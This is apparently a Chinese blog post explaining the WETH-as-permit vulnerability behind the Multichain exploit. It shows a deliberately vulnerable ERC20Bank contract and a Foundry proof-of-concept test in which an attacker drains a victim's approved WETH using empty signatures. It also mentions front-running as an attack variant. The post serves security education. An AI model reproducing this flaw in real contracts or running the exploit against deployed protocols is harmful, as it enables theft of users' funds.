目前大部分新发的ERC20Token都带有permit功能,即通过签名完成授权。签名的人不需要上链,省了gas,但是实际上更危险,一不小心签名,可能把所有的Token授权给他人了。 错误的协议实现即把WETH当成了IERC20Permit使用,也会造成损失。
目前大部分新发的ERC20 Token都带有permit功能,即通过签名完成授权。签名的人不需要上链,省了gas,但是实际上更危险,一不小心签名,可能把所有的Token授权给他人了。下面是permit的细节
/**
* @inheritdoc IERC20Permit
*/
function permit(
address owner,
address spender,
uint256 value,
uint256 deadline,
uint8 v,
bytes32 r,
bytes32 s
) public virtual {
if (block.timestamp > deadline) {
revert ERC2612ExpiredSignature(deadline);
}
bytes32 structHash = keccak256(abi.encode(PERMIT_TYPEHASH, owner, spender, value, _useNonce(owner), deadline));
bytes32 hash = _hashTypedDataV4(structHash);
address signer = ECDSA.recover(hash, v, r, s);
if (signer != owner) {
revert ERC2612InvalidSigner(signer, owner);
}
_approve(owner, spender, value);
}
不过本文不是主要分析个人怎么防止随意签名,而是协议在实现过程中不注意,将WETH当成了IERC20Permit使用,则有可能造成大的损失。
我们知道WETH没有permit函数。但是它的fallback啥都没检查,实际上在WETHsh上调用任意函数都会通过不会报错。因为它将是调用了一遍msg.value=0
的deposit而已。
fallback() external payable {
deposit();
}
function deposit() public payable {
balanceOf[msg.sender] += msg.value;
emit Deposit(msg.sender, msg.value);
}
即把WETH当成了IERC20Permit使用
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {IERC20Permit} from "./IERC20Permit.sol";
contract ERC20Bank {
IERC20Permit public immutable token;
mapping(address => uint256) public balanceOf;
constructor(address _token) {
token = IERC20Permit(_token);
}
function deposit(uint256 _amount) external {
token.transferFrom(msg.sender, address(this), _amount);
balanceOf[msg.sender] += _amount;
}
function depositWithPermit(
address owner,
address recipient,
uint256 amount,
uint256 deadline,
uint8 v,
bytes32 r,
bytes32 s
) external {
//do not check signaturer == owner
token.permit(owner, address(this), amount, deadline, v, r, s);
token.transferFrom(owner, address(this), amount);
balanceOf[recipient] += amount;
}
function withdraw(uint256 _amount) external {
balanceOf[msg.sender] -= _amount;
token.transfer(msg.sender, _amount);
}
}
测试代码:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Test, console2} from "forge-std/Test.sol";
import {ERC20Bank} from "../../src/WETH-Permit/ERC20Bank.sol";
import {WETH9} from "../mocks/WETH9.sol";
contract ERC20BankExploitWETHPermitTest is Test {
WETH9 private weth;
ERC20Bank private bank;
address private constant user = address(11);
address private constant attacker = address(12);
function setUp() public {
weth = new WETH9();
bank = new ERC20Bank(address(weth));
deal(user, 100 * 1e18);
vm.startPrank(user);
weth.deposit{value: 100 * 1e18}();
weth.approve(address(bank), type(uint256).max);
bank.deposit(1e18);
vm.stopPrank();
}
function testWETHPermit() public {
uint256 bal = weth.balanceOf(user);
vm.startPrank(attacker);
bank.depositWithPermit(user, attacker, bal, 0, 0, "", "");
bank.withdraw(bal);
vm.stopPrank();
assertEq(weth.balanceOf(user), 0, "WETH balance of user");
assertEq(
weth.balanceOf(address(attacker)),
99 * 1e18,
"WETH balance of attacker"
);
}
}
损失发生的前提是User也要对合约ERC20Bank进行授权。当然如果没有最大授权,依然可以进行攻击,可以通过检测有用户授权合约ERC20Bank,frontrun用户的deposit()
的调用,完成攻击。
参考:
https://medium.com/zengo/without-permit-multichains-exploit-explained-8417e8c1639b
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!